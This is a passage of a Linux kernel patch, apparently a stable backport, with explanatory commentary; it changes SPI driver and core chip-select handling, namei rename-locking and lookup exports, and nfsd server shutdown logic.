+ 		.of_match_table = adis16475_of_match,
+ 	},
+ 	.probe = adis16475_probe,
++	.id_table = adis16475_ids,
+ };
+ module_spi_driver(adis16475_driver);
+ 
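+
+Moving the OF table below probe() and adding a matching spi_device_id table pairs with the spi_get_device_match_data() helper introduced later in this patch (see the drivers/spi/spi.c hunk below): firmware match data is tried first, and the id table's driver_data is the fallback, so devices instantiated by name still resolve a valid chip_info. A minimal sketch of a driver wired the same way; the "vendor,mychip" names and mychip_info type are hypothetical:
+
+	#include <linux/module.h>
+	#include <linux/spi/spi.h>
+
+	struct mychip_info { int whoami; };	/* hypothetical */
+
+	static const struct mychip_info mychip_a = { .whoami = 0x10 };
+
+	static int mychip_probe(struct spi_device *spi)
+	{
+		/* resolves via OF/ACPI match data, else the spi_device_id table */
+		const struct mychip_info *info = spi_get_device_match_data(spi);
+
+		if (!info)
+			return -EINVAL;
+		return 0;
+	}
+
+	static const struct of_device_id mychip_of_match[] = {
+		{ .compatible = "vendor,mychip-a", .data = &mychip_a },
+		{ }
+	};
+	MODULE_DEVICE_TABLE(of, mychip_of_match);
+
+	static const struct spi_device_id mychip_ids[] = {
+		{ "mychip-a", (kernel_ulong_t)&mychip_a },
+		{ }
+	};
+	MODULE_DEVICE_TABLE(spi, mychip_ids);
+
+	static struct spi_driver mychip_driver = {
+		.driver = {
+			.name		= "mychip",
+			.of_match_table	= mychip_of_match,
+		},
+		.probe	  = mychip_probe,
+		.id_table = mychip_ids,
+	};
+	module_spi_driver(mychip_driver);
+
+	MODULE_DESCRIPTION("sketch only");
+	MODULE_LICENSE("GPL");
+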
+diff --git a/drivers/spi/spi-atmel.c b/drivers/spi/spi-atmel.c
+index c4f22d50dba58..78daf2b2143c5 100644
+--- a/drivers/spi/spi-atmel.c
++++ b/drivers/spi/spi-atmel.c
+@@ -22,6 +22,7 @@
+ #include <linux/gpio/consumer.h>
+ #include <linux/pinctrl/consumer.h>
+ #include <linux/pm_runtime.h>
++#include <linux/iopoll.h>
+ #include <trace/events/spi.h>
+ 
+ /* SPI register offsets */
+@@ -278,6 +279,7 @@ struct atmel_spi {
+ 	bool			keep_cs;
+ 
+ 	u32			fifo_size;
++	bool			last_polarity;
+ 	u8			native_cs_free;
+ 	u8			native_cs_for_gpio;
+ };
+@@ -290,6 +292,22 @@ struct atmel_spi_device {
+ #define SPI_MAX_DMA_XFER	65535 /* true for both PDC and DMA */
+ #define INVALID_DMA_ADDRESS	0xffffffff
+ 
++/*
++ * This frequency can be anything supported by the controller, but to avoid
++ * unnecessary delay, the highest possible frequency is chosen.
++ *
++ * This frequency is the highest possible which is not interfering with other
++ * chip select registers (see Note for Serial Clock Bit Rate configuration in
++ * Atmel-11121F-ATARM-SAMA5D3-Series-Datasheet_02-Feb-16, page 1283)
++ */
++#define DUMMY_MSG_FREQUENCY	0x02
++/*
++ * 8 bits is the minimum data the controller is capable of sending.
++ *
++ * This message can be anything as it should not be treated by any SPI device.
++ */
++#define DUMMY_MSG		0xAA
++
+ /*
+  * Version 2 of the SPI controller has
+  *  - CR.LASTXFER
+@@ -303,6 +321,43 @@ static bool atmel_spi_is_v2(struct atmel_spi *as)
+ 	return as->caps.is_spi2;
+ }
+ 
++/*
++ * Send a dummy message.
++ *
++ * This is sometimes needed when using a CS GPIO to force clock transition when
++ * switching between devices with different polarities.
++ */
++static void atmel_spi_send_dummy(struct atmel_spi *as, struct spi_device *spi, int chip_select)
++{
++	u32 status;
++	u32 csr;
++
++	/*
++	 * Set a clock frequency to allow sending message on SPI bus.
++	 * The frequency here can be anything, but is needed for
++	 * the controller to send the data.
++	 */
++	csr = spi_readl(as, CSR0 + 4 * chip_select);
++	csr = SPI_BFINS(SCBR, DUMMY_MSG_FREQUENCY, csr);
++	spi_writel(as, CSR0 + 4 * chip_select, csr);
++
++	/*
++	 * Read all data coming from SPI bus, needed to be able to send
++	 * the message.
++	 */
++	spi_readl(as, RDR);
++	while (spi_readl(as, SR) & SPI_BIT(RDRF)) {
++		spi_readl(as, RDR);
++		cpu_relax();
++	}
++
++	spi_writel(as, TDR, DUMMY_MSG);
++
++	readl_poll_timeout_atomic(as->regs + SPI_SR, status,
++				  (status & SPI_BIT(TXEMPTY)), 1, 1000);
++}
++
++
+ /*
+  * Earlier SPI controllers (e.g. on at91rm9200) have a design bug whereby
+  * they assume that spi slave device state will not change on deselect, so
+@@ -319,11 +374,17 @@ static bool atmel_spi_is_v2(struct atmel_spi *as)
+  * Master on Chip Select 0.")  No workaround exists for that ... so for
+  * nCS0 on that chip, we (a) don't use the GPIO, (b) can't support CS_HIGH,
+  * and (c) will trigger that first erratum in some cases.
++ *
++ * When changing the clock polarity, the SPI controller waits for the next
++ * transmission to enforce the default clock state. This may be an issue when
++ * using a GPIO as Chip Select: the clock level is applied only when the first
++ * packet is sent, once the CS has already been asserted. The workaround is to
++ * avoid this by sending a first (dummy) message before toggling the CS state.
+  */
+-
+ static void cs_activate(struct atmel_spi *as, struct spi_device *spi)
+ {
+ 	struct atmel_spi_device *asd = spi->controller_state;
++	bool new_polarity;
+ 	int chip_select;
+ 	u32 mr;
+ 
+@@ -352,6 +413,25 @@ static void cs_activate(struct atmel_spi *as, struct spi_device *spi)
+ 		}
+ 
+ 		mr = spi_readl(as, MR);
++
++		/*
++		 * Ensures the clock polarity is valid before we actually
++		 * assert the CS to avoid spurious clock edges to be
++		 * processed by the spi devices.
++		 */
++		if (spi_get_csgpiod(spi, 0)) {
++			new_polarity = (asd->csr & SPI_BIT(CPOL)) != 0;
++			if (new_polarity != as->last_polarity) {
++				/*
++				 * Need to disable the GPIO before sending the dummy
++				 * message because it is already set by the spi core.
++				 */
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), 0);
++				atmel_spi_send_dummy(as, spi, chip_select);
++				as->last_polarity = new_polarity;
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), 1);
++			}
++		}
+ 	} else {
+ 		u32 cpol = (spi->mode & SPI_CPOL) ? SPI_BIT(CPOL) : 0;
+ 		int i;
+diff --git a/drivers/spi/spi.c b/drivers/spi/spi.c
+index 5d046be8b2dd5..22d227878bc44 100644
+--- a/drivers/spi/spi.c
++++ b/drivers/spi/spi.c
+@@ -360,6 +360,18 @@ const struct spi_device_id *spi_get_device_id(const struct spi_device *sdev)
+ }
+ EXPORT_SYMBOL_GPL(spi_get_device_id);
+ 
++const void *spi_get_device_match_data(const struct spi_device *sdev)
++{
++	const void *match;
++
++	match = device_get_match_data(&sdev->dev);
++	if (match)
++		return match;
++
++	return (const void *)spi_get_device_id(sdev)->driver_data;
++}
++EXPORT_SYMBOL_GPL(spi_get_device_match_data);
++
+ static int spi_match_device(struct device *dev, struct device_driver *drv)
+ {
+ 	const struct spi_device	*spi = to_spi_device(dev);
+@@ -592,7 +604,7 @@ static void spi_dev_set_name(struct spi_device *spi)
+ 	}
+ 
+ 	dev_set_name(&spi->dev, "%s.%u", dev_name(&spi->controller->dev),
+-		     spi->chip_select);
++		     spi_get_chipselect(spi, 0));
+ }
+ 
+ static int spi_dev_check(struct device *dev, void *data)
+@@ -601,7 +613,7 @@ static int spi_dev_check(struct device *dev, void *data)
+ 	struct spi_device *new_spi = data;
+ 
+ 	if (spi->controller == new_spi->controller &&
+-	    spi->chip_select == new_spi->chip_select)
++	    spi_get_chipselect(spi, 0) == spi_get_chipselect(new_spi, 0))
+ 		return -EBUSY;
+ 	return 0;
+ }
+@@ -626,7 +638,7 @@ static int __spi_add_device(struct spi_device *spi)
+ 	status = bus_for_each_dev(&spi_bus_type, NULL, spi, spi_dev_check);
+ 	if (status) {
+ 		dev_err(dev, "chipselect %d already in use\n",
+-				spi->chip_select);
++				spi_get_chipselect(spi, 0));
+ 		return status;
+ 	}
+ 
+@@ -637,7 +649,7 @@ static int __spi_add_device(struct spi_device *spi)
+ 	}
+ 
+ 	if (ctlr->cs_gpiods)
+-		spi->cs_gpiod = ctlr->cs_gpiods[spi->chip_select];
++		spi_set_csgpiod(spi, 0, ctlr->cs_gpiods[spi_get_chipselect(spi, 0)]);
+ 
+ 	/*
+ 	 * Drivers may modify this initial i/o setup, but will
+@@ -680,8 +692,8 @@ int spi_add_device(struct spi_device *spi)
+ 	int status;
+ 
+ 	/* Chipselects are numbered 0..max; validate. */
+-	if (spi->chip_select >= ctlr->num_chipselect) {
+-		dev_err(dev, "cs%d >= max %d\n", spi->chip_select,
++	if (spi_get_chipselect(spi, 0) >= ctlr->num_chipselect) {
++		dev_err(dev, "cs%d >= max %d\n", spi_get_chipselect(spi, 0),
+ 			ctlr->num_chipselect);
+ 		return -EINVAL;
+ 	}
+@@ -702,8 +714,8 @@ static int spi_add_device_locked(struct spi_device *spi)
+ 	struct device *dev = ctlr->dev.parent;
+ 
+ 	/* Chipselects are numbered 0..max; validate. */
+-	if (spi->chip_select >= ctlr->num_chipselect) {
+-		dev_err(dev, "cs%d >= max %d\n", spi->chip_select,
++	if (spi_get_chipselect(spi, 0) >= ctlr->num_chipselect) {
++		dev_err(dev, "cs%d >= max %d\n", spi_get_chipselect(spi, 0),
+ 			ctlr->num_chipselect);
+ 		return -EINVAL;
+ 	}
+@@ -749,7 +761,7 @@ struct spi_device *spi_new_device(struct spi_controller *ctlr,
+ 
+ 	WARN_ON(strlen(chip->modalias) >= sizeof(proxy->modalias));
+ 
+-	proxy->chip_select = chip->chip_select;
++	spi_set_chipselect(proxy, 0, chip->chip_select);
+ 	proxy->max_speed_hz = chip->max_speed_hz;
+ 	proxy->mode = chip->mode;
+ 	proxy->irq = chip->irq;
+@@ -958,24 +970,23 @@ static void spi_set_cs(struct spi_device *spi, bool enable, bool force)
+ 	 * Avoid calling into the driver (or doing delays) if the chip select
+ 	 * isn't actually changing from the last time this was called.
+ 	 */
+-	if (!force && ((enable && spi->controller->last_cs == spi->chip_select) ||
+-				(!enable && spi->controller->last_cs != spi->chip_select)) &&
++	if (!force && ((enable && spi->controller->last_cs == spi_get_chipselect(spi, 0)) ||
++		       (!enable && spi->controller->last_cs != spi_get_chipselect(spi, 0))) &&
+ 	    (spi->controller->last_cs_mode_high == (spi->mode & SPI_CS_HIGH)))
+ 		return;
+ 
+ 	trace_spi_set_cs(spi, activate);
+ 
+-	spi->controller->last_cs = enable ? spi->chip_select : -1;
++	spi->controller->last_cs = enable ? spi_get_chipselect(spi, 0) : -1;
+ 	spi->controller->last_cs_mode_high = spi->mode & SPI_CS_HIGH;
+ 
+-	if ((spi->cs_gpiod || !spi->controller->set_cs_timing) && !activate) {
++	if ((spi_get_csgpiod(spi, 0) || !spi->controller->set_cs_timing) && !activate)
+ 		spi_delay_exec(&spi->cs_hold, NULL);
+-	}
+ 
+ 	if (spi->mode & SPI_CS_HIGH)
+ 		enable = !enable;
+ 
+-	if (spi->cs_gpiod) {
++	if (spi_get_csgpiod(spi, 0)) {
+ 		if (!(spi->mode & SPI_NO_CS)) {
+ 			/*
+ 			 * Historically ACPI has no means of the GPIO polarity and
+@@ -988,10 +999,10 @@ static void spi_set_cs(struct spi_device *spi, bool enable, bool force)
+ 			 * into account.
+ 			 */
+ 			if (has_acpi_companion(&spi->dev))
+-				gpiod_set_value_cansleep(spi->cs_gpiod, !enable);
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), !enable);
+ 			else
+ 				/* Polarity handled by GPIO library */
+-				gpiod_set_value_cansleep(spi->cs_gpiod, activate);
++				gpiod_set_value_cansleep(spi_get_csgpiod(spi, 0), activate);
+ 		}
+ 		/* Some SPI masters need both GPIO CS & slave_select */
+ 		if ((spi->controller->flags & SPI_MASTER_GPIO_SS) &&
+@@ -1001,7 +1012,7 @@ static void spi_set_cs(struct spi_device *spi, bool enable, bool force)
+ 		spi->controller->set_cs(spi, !enable);
+ 	}
+ 
+-	if (spi->cs_gpiod || !spi->controller->set_cs_timing) {
++	if (spi_get_csgpiod(spi, 0) || !spi->controller->set_cs_timing) {
+ 		if (activate)
+ 			spi_delay_exec(&spi->cs_setup, NULL);
+ 		else
+@@ -2291,7 +2302,7 @@ static int of_spi_parse_dt(struct spi_controller *ctlr, struct spi_device *spi,
+ 			nc, rc);
+ 		return rc;
+ 	}
+-	spi->chip_select = value;
++	spi_set_chipselect(spi, 0, value);
+ 
+ 	/* Device speed */
+ 	if (!of_property_read_u32(nc, "spi-max-frequency", &value))
+@@ -2405,7 +2416,7 @@ struct spi_device *spi_new_ancillary_device(struct spi_device *spi,
+ 	strscpy(ancillary->modalias, "dummy", sizeof(ancillary->modalias));
+ 
+ 	/* Use provided chip-select for ancillary device */
+-	ancillary->chip_select = chip_select;
++	spi_set_chipselect(ancillary, 0, chip_select);
+ 
+ 	/* Take over SPI mode/speed from SPI main device */
+ 	ancillary->max_speed_hz = spi->max_speed_hz;
+@@ -2652,7 +2663,7 @@ struct spi_device *acpi_spi_device_alloc(struct spi_controller *ctlr,
+ 	spi->mode		|= lookup.mode;
+ 	spi->irq		= lookup.irq;
+ 	spi->bits_per_word	= lookup.bits_per_word;
+-	spi->chip_select	= lookup.chip_select;
++	spi_set_chipselect(spi, 0, lookup.chip_select);
+ 
+ 	return spi;
+ }
+@@ -3611,6 +3622,37 @@ static int __spi_validate_bits_per_word(struct spi_controller *ctlr,
+ 	return 0;
+ }
+ 
++/**
++ * spi_set_cs_timing - configure CS setup, hold, and inactive delays
++ * @spi: the device that requires specific CS timing configuration
++ *
++ * Return: zero on success, else a negative error code.
++ */
++static int spi_set_cs_timing(struct spi_device *spi)
++{
++	struct device *parent = spi->controller->dev.parent;
++	int status = 0;
++
++	if (spi->controller->set_cs_timing && !spi_get_csgpiod(spi, 0)) {
++		if (spi->controller->auto_runtime_pm) {
++			status = pm_runtime_get_sync(parent);
++			if (status < 0) {
++				pm_runtime_put_noidle(parent);
++				dev_err(&spi->controller->dev, "Failed to power device: %d\n",
++					status);
++				return status;
++			}
++
++			status = spi->controller->set_cs_timing(spi);
++			pm_runtime_mark_last_busy(parent);
++			pm_runtime_put_autosuspend(parent);
++		} else {
++			status = spi->controller->set_cs_timing(spi);
++		}
++	}
++	return status;
++}
++
+ /**
+  * spi_setup - setup SPI mode and clock rate
+  * @spi: the device whose settings are being modified
+@@ -3707,6 +3749,12 @@ int spi_setup(struct spi_device *spi)
+ 		}
+ 	}
+ 
++	status = spi_set_cs_timing(spi);
++	if (status) {
++		mutex_unlock(&spi->controller->io_mutex);
++		return status;
++	}
++
+ 	if (spi->controller->auto_runtime_pm && spi->controller->set_cs) {
+ 		status = pm_runtime_resume_and_get(spi->controller->dev.parent);
+ 		if (status < 0) {
+@@ -3790,7 +3838,7 @@ static int __spi_validate(struct spi_device *spi, struct spi_message *message)
+ 	 * cs_change is set for each transfer.
+ 	 */
+ 	if ((spi->mode & SPI_CS_WORD) && (!(ctlr->mode_bits & SPI_CS_WORD) ||
+-					  spi->cs_gpiod)) {
++					  spi_get_csgpiod(spi, 0))) {
+ 		size_t maxsize;
+ 		int ret;
+ 
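+
+The bulk of this spi.c hunk is a mechanical conversion from direct spi->chip_select and spi->cs_gpiod accesses to the spi_get_chipselect()/spi_set_chipselect() and spi_get_csgpiod()/spi_set_csgpiod() accessors, always with index 0. On a single-chip-select kernel such as this 6.1 backport the accessors reduce to plain field wrappers, roughly as below (a sketch of the shape, not the literal spi.h definitions, which are outside this patch excerpt):
+
+	static inline u8 spi_get_chipselect(const struct spi_device *spi, u8 idx)
+	{
+		return spi->chip_select;	/* idx unused with a single CS */
+	}
+
+	static inline void spi_set_chipselect(struct spi_device *spi, u8 idx, u8 cs)
+	{
+		spi->chip_select = cs;
+	}
+
+The indirection is what later lets the core grow per-device arrays of chip selects without touching every driver again.
+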
+diff --git a/drivers/usb/host/fotg210-hcd.c b/drivers/usb/host/fotg210-hcd.c
+index c4c1fbc12b4cd..dc968960769e1 100644
+--- a/drivers/usb/host/fotg210-hcd.c
++++ b/drivers/usb/host/fotg210-hcd.c
+@@ -429,8 +429,6 @@ static void qh_lines(struct fotg210_hcd *fotg210, struct fotg210_qh *qh,
+ 			temp = size;
+ 		size -= temp;
+ 		next += temp;
+-		if (temp == size)
+-			goto done;
+ 	}
+ 
+ 	temp = snprintf(next, size, "\n");
+@@ -440,7 +438,6 @@ static void qh_lines(struct fotg210_hcd *fotg210, struct fotg210_qh *qh,
+ 	size -= temp;
+ 	next += temp;
+ 
+-done:
+ 	*sizep = size;
+ 	*nextp = next;
+ }
+diff --git a/fs/namei.c b/fs/namei.c
+index 5e1c2ab2ae709..b5578f4ce5d6e 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -253,6 +253,7 @@ getname_kernel(const char * filename)
+ 
+ 	return result;
+ }
++EXPORT_SYMBOL(getname_kernel);
+ 
+ void putname(struct filename *name)
+ {
+@@ -271,6 +272,7 @@ void putname(struct filename *name)
+ 	} else
+ 		__putname(name);
+ }
++EXPORT_SYMBOL(putname);
+ 
+ /**
+  * check_acl - perform ACL permission checking
+@@ -1581,8 +1583,9 @@ static struct dentry *lookup_dcache(const struct qstr *name,
+  * when directory is guaranteed to have no in-lookup children
+  * at all.
+  */
+-static struct dentry *__lookup_hash(const struct qstr *name,
+-		struct dentry *base, unsigned int flags)
++struct dentry *lookup_one_qstr_excl(const struct qstr *name,
++				    struct dentry *base,
++				    unsigned int flags)
+ {
+ 	struct dentry *dentry = lookup_dcache(name, base, flags);
+ 	struct dentry *old;
+@@ -1606,6 +1609,7 @@ static struct dentry *__lookup_hash(const struct qstr *name,
+ 	}
+ 	return dentry;
+ }
++EXPORT_SYMBOL(lookup_one_qstr_excl);
+ 
+ static struct dentry *lookup_fast(struct nameidata *nd)
+ {
+@@ -2532,16 +2536,17 @@ static int path_parentat(struct nameidata *nd, unsigned flags,
+ }
+ 
+ /* Note: this does not consume "name" */
+-static int filename_parentat(int dfd, struct filename *name,
+-			     unsigned int flags, struct path *parent,
+-			     struct qstr *last, int *type)
++static int __filename_parentat(int dfd, struct filename *name,
++			       unsigned int flags, struct path *parent,
++			       struct qstr *last, int *type,
++			       const struct path *root)
+ {
+ 	int retval;
+ 	struct nameidata nd;
+ 
+ 	if (IS_ERR(name))
+ 		return PTR_ERR(name);
+-	set_nameidata(&nd, dfd, name, NULL);
++	set_nameidata(&nd, dfd, name, root);
+ 	retval = path_parentat(&nd, flags | LOOKUP_RCU, parent);
+ 	if (unlikely(retval == -ECHILD))
+ 		retval = path_parentat(&nd, flags, parent);
+@@ -2556,6 +2561,13 @@ static int filename_parentat(int dfd, struct filename *name,
+ 	return retval;
+ }
+ 
++static int filename_parentat(int dfd, struct filename *name,
++			     unsigned int flags, struct path *parent,
++			     struct qstr *last, int *type)
++{
++	return __filename_parentat(dfd, name, flags, parent, last, type, NULL);
++}
++
+ /* does lookup, returns the object with parent locked */
+ static struct dentry *__kern_path_locked(struct filename *name, struct path *path)
+ {
+@@ -2571,7 +2583,7 @@ static struct dentry *__kern_path_locked(struct filename *name, struct path *pat
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 	inode_lock_nested(path->dentry->d_inode, I_MUTEX_PARENT);
+-	d = __lookup_hash(&last, path->dentry, 0);
++	d = lookup_one_qstr_excl(&last, path->dentry, 0);
+ 	if (IS_ERR(d)) {
+ 		inode_unlock(path->dentry->d_inode);
+ 		path_put(path);
+@@ -2599,6 +2611,24 @@ int kern_path(const char *name, unsigned int flags, struct path *path)
+ }
+ EXPORT_SYMBOL(kern_path);
+ 
++/**
++ * vfs_path_parent_lookup - lookup a parent path relative to a dentry-vfsmount pair
++ * @filename: filename structure
++ * @flags: lookup flags
++ * @parent: pointer to struct path to fill
++ * @last: last component
++ * @type: type of the last component
++ * @root: pointer to struct path of the base directory
++ */
++int vfs_path_parent_lookup(struct filename *filename, unsigned int flags,
++			   struct path *parent, struct qstr *last, int *type,
++			   const struct path *root)
++{
++	return  __filename_parentat(AT_FDCWD, filename, flags, parent, last,
++				    type, root);
++}
++EXPORT_SYMBOL(vfs_path_parent_lookup);
++
+ /**
+  * vfs_path_lookup - lookup a file path relative to a dentry-vfsmount pair
+  * @dentry:  pointer to dentry of the base directory
+@@ -2980,20 +3010,10 @@ static inline int may_create(struct user_namespace *mnt_userns,
+ 	return inode_permission(mnt_userns, dir, MAY_WRITE | MAY_EXEC);
+ }
+ 
+-/*
+- * p1 and p2 should be directories on the same fs.
+- */
+-struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
++static struct dentry *lock_two_directories(struct dentry *p1, struct dentry *p2)
+ {
+ 	struct dentry *p;
+ 
+-	if (p1 == p2) {
+-		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
+-		return NULL;
+-	}
+-
+-	mutex_lock(&p1->d_sb->s_vfs_rename_mutex);
+-
+ 	p = d_ancestor(p2, p1);
+ 	if (p) {
+ 		inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
+@@ -3012,8 +3032,64 @@ struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
+ 			I_MUTEX_PARENT, I_MUTEX_PARENT2);
+ 	return NULL;
+ }
++
++/*
++ * p1 and p2 should be directories on the same fs.
++ */
++struct dentry *lock_rename(struct dentry *p1, struct dentry *p2)
++{
++	if (p1 == p2) {
++		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
++		return NULL;
++	}
++
++	mutex_lock(&p1->d_sb->s_vfs_rename_mutex);
++	return lock_two_directories(p1, p2);
++}
+ EXPORT_SYMBOL(lock_rename);
+ 
++/*
++ * c1 and p2 should be on the same fs.
++ */
++struct dentry *lock_rename_child(struct dentry *c1, struct dentry *p2)
++{
++	if (READ_ONCE(c1->d_parent) == p2) {
++		/*
++		 * hopefully won't need to touch ->s_vfs_rename_mutex at all.
++		 */
++		inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
++		/*
++		 * now that p2 is locked, nobody can move in or out of it,
++		 * so the test below is safe.
++		 */
++		if (likely(c1->d_parent == p2))
++			return NULL;
++
++		/*
++		 * c1 got moved out of p2 while we'd been taking locks;
++		 * unlock and fall back to slow case.
++		 */
++		inode_unlock(p2->d_inode);
++	}
++
++	mutex_lock(&c1->d_sb->s_vfs_rename_mutex);
++	/*
++	 * nobody can move out of any directories on this fs.
++	 */
++	if (likely(c1->d_parent != p2))
++		return lock_two_directories(c1->d_parent, p2);
++
++	/*
++	 * c1 got moved into p2 while we were taking locks;
++	 * we need p2 locked and ->s_vfs_rename_mutex unlocked,
++	 * for consistency with lock_rename().
++	 */
++	inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
++	mutex_unlock(&c1->d_sb->s_vfs_rename_mutex);
++	return NULL;
++}
++EXPORT_SYMBOL(lock_rename_child);
++
+ void unlock_rename(struct dentry *p1, struct dentry *p2)
+ {
+ 	inode_unlock(p1->d_inode);
+@@ -3806,7 +3882,8 @@ static struct dentry *filename_create(int dfd, struct filename *name,
+ 	if (last.name[last.len] && !want_dir)
+ 		create_flags = 0;
+ 	inode_lock_nested(path->dentry->d_inode, I_MUTEX_PARENT);
+-	dentry = __lookup_hash(&last, path->dentry, reval_flag | create_flags);
++	dentry = lookup_one_qstr_excl(&last, path->dentry,
++				      reval_flag | create_flags);
+ 	if (IS_ERR(dentry))
+ 		goto unlock;
+ 
+@@ -4168,7 +4245,7 @@ retry:
+ 		goto exit2;
+ 
+ 	inode_lock_nested(path.dentry->d_inode, I_MUTEX_PARENT);
+-	dentry = __lookup_hash(&last, path.dentry, lookup_flags);
++	dentry = lookup_one_qstr_excl(&last, path.dentry, lookup_flags);
+ 	error = PTR_ERR(dentry);
+ 	if (IS_ERR(dentry))
+ 		goto exit3;
+@@ -4302,7 +4379,7 @@ retry:
+ 		goto exit2;
+ retry_deleg:
+ 	inode_lock_nested(path.dentry->d_inode, I_MUTEX_PARENT);
+-	dentry = __lookup_hash(&last, path.dentry, lookup_flags);
++	dentry = lookup_one_qstr_excl(&last, path.dentry, lookup_flags);
+ 	error = PTR_ERR(dentry);
+ 	if (!IS_ERR(dentry)) {
+ 		struct user_namespace *mnt_userns;
+@@ -4876,7 +4953,8 @@ retry:
+ retry_deleg:
+ 	trap = lock_rename(new_path.dentry, old_path.dentry);
+ 
+-	old_dentry = __lookup_hash(&old_last, old_path.dentry, lookup_flags);
++	old_dentry = lookup_one_qstr_excl(&old_last, old_path.dentry,
++					  lookup_flags);
+ 	error = PTR_ERR(old_dentry);
+ 	if (IS_ERR(old_dentry))
+ 		goto exit3;
+@@ -4884,7 +4962,8 @@ retry_deleg:
+ 	error = -ENOENT;
+ 	if (d_is_negative(old_dentry))
+ 		goto exit4;
+-	new_dentry = __lookup_hash(&new_last, new_path.dentry, lookup_flags | target_flags);
++	new_dentry = lookup_one_qstr_excl(&new_last, new_path.dentry,
++					  lookup_flags | target_flags);
+ 	error = PTR_ERR(new_dentry);
+ 	if (IS_ERR(new_dentry))
+ 		goto exit4;
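+
+lock_rename_child() gives callers that hold only the source dentry, not a stable reference to its parent, the same guarantees as lock_rename(): on return the relevant parent inode locks are held, c1->d_parent can no longer change, and the returned dentry is the "trap" common ancestor (or NULL) that rename callers must compare against. A hedged sketch of the calling pattern, with a hypothetical helper name:
+
+	static int example_rename_locked(struct dentry *old_child,
+					 struct dentry *new_dir)	/* hypothetical */
+	{
+		struct dentry *trap;
+
+		trap = lock_rename_child(old_child, new_dir);
+		/*
+		 * Both directories are now locked and old_child->d_parent is
+		 * stable.  Look up source and target under the locks, refuse
+		 * the rename if either dentry equals trap (a directory would
+		 * be moved into its own subtree), then call vfs_rename().
+		 */
+		unlock_rename(old_child->d_parent, new_dir);
+		return 0;
+	}
+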
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 573de0d49e172..b3b4542e31ed5 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -716,8 +716,10 @@ static ssize_t __write_ports_addfd(char *buf, struct net *net, const struct cred
+ 
+ 	err = svc_addsock(nn->nfsd_serv, net, fd, buf, SIMPLE_TRANSACTION_LIMIT, cred);
+ 
+-	if (err >= 0 &&
+-	    !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
++	if (err < 0 && !nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++	else if (err >= 0 &&
++		 !nn->nfsd_serv->sv_nrthreads && !xchg(&nn->keep_active, 1))
+ 		svc_get(nn->nfsd_serv);
+ 
+ 	nfsd_put(net);
+@@ -767,6 +769,9 @@ out_close:
+ 		svc_xprt_put(xprt);
+ 	}
+ out_err:
++	if (!nn->nfsd_serv->sv_nrthreads && !nn->keep_active)
++		nfsd_last_thread(net);
++
+ 	nfsd_put(net);
+ 	return err;
+ }
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 09726c5b9a317..53166cce7062c 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -97,7 +97,12 @@ int		nfsd_pool_stats_open(struct inode *, struct file *);
+ int		nfsd_pool_stats_release(struct inode *, struct file *);
+ void		nfsd_shutdown_threads(struct net *net);
+ 
+-void		nfsd_put(struct net *net);
++static inline void nfsd_put(struct net *net)
++{
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++
++	svc_put(nn->nfsd_serv);
++}
+ 
+ bool		i_am_nfsd(void);
+ 
+@@ -134,6 +139,7 @@ int nfsd_vers(struct nfsd_net *nn, int vers, enum vers_op change);
+ int nfsd_minorversion(struct nfsd_net *nn, u32 minorversion, enum vers_op change);
+ void nfsd_reset_versions(struct nfsd_net *nn);
+ int nfsd_create_serv(struct net *net);
++void nfsd_last_thread(struct net *net);
+ 
+ extern int nfsd_max_blksize;
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index f6cc99af81925..350c6c72f793f 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -523,9 +523,14 @@ static struct notifier_block nfsd_inet6addr_notifier = {
+ /* Only used under nfsd_mutex, so this atomic may be overkill: */
+ static atomic_t nfsd_notifier_refcount = ATOMIC_INIT(0);
+ 
+-static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
++void nfsd_last_thread(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
++	struct svc_serv *serv = nn->nfsd_serv;
++
++	spin_lock(&nfsd_notifier_lock);
++	nn->nfsd_serv = NULL;
++	spin_unlock(&nfsd_notifier_lock);
+ 
+ 	/* check if the notifier still has clients */
+ 	if (atomic_dec_return(&nfsd_notifier_refcount) == 0) {
+@@ -535,6 +540,8 @@ static void nfsd_last_thread(struct svc_serv *serv, struct net *net)
+ #endif
+ 	}
+ 
++	svc_xprt_destroy_all(serv, net);
++
+ 	/*
+ 	 * write_ports can create the server without actually starting
+ 	 * any threads--if we get shut down before any threads are
+@@ -625,7 +632,8 @@ void nfsd_shutdown_threads(struct net *net)
+ 	svc_get(serv);
+ 	/* Kill outstanding nfsd threads */
+ 	svc_set_num_threads(serv, NULL, 0);
+-	nfsd_put(net);
++	nfsd_last_thread(net);
++	svc_put(serv);
+ 	mutex_unlock(&nfsd_mutex);
+ }
+ 
+@@ -655,9 +663,6 @@ int nfsd_create_serv(struct net *net)
+ 	serv->sv_maxconn = nn->max_connections;
+ 	error = svc_bind(serv, net);
+ 	if (error < 0) {
+-		/* NOT nfsd_put() as notifiers (see below) haven't
+-		 * been set up yet.
+-		 */
+ 		svc_put(serv);
+ 		return error;
+ 	}
+@@ -700,29 +705,6 @@ int nfsd_get_nrthreads(int n, int *nthreads, struct net *net)
+ 	return 0;
+ }
+ 
+-/* This is the callback for kref_put() below.
+- * There is no code here as the first thing to be done is
+- * call svc_shutdown_net(), but we cannot get the 'net' from
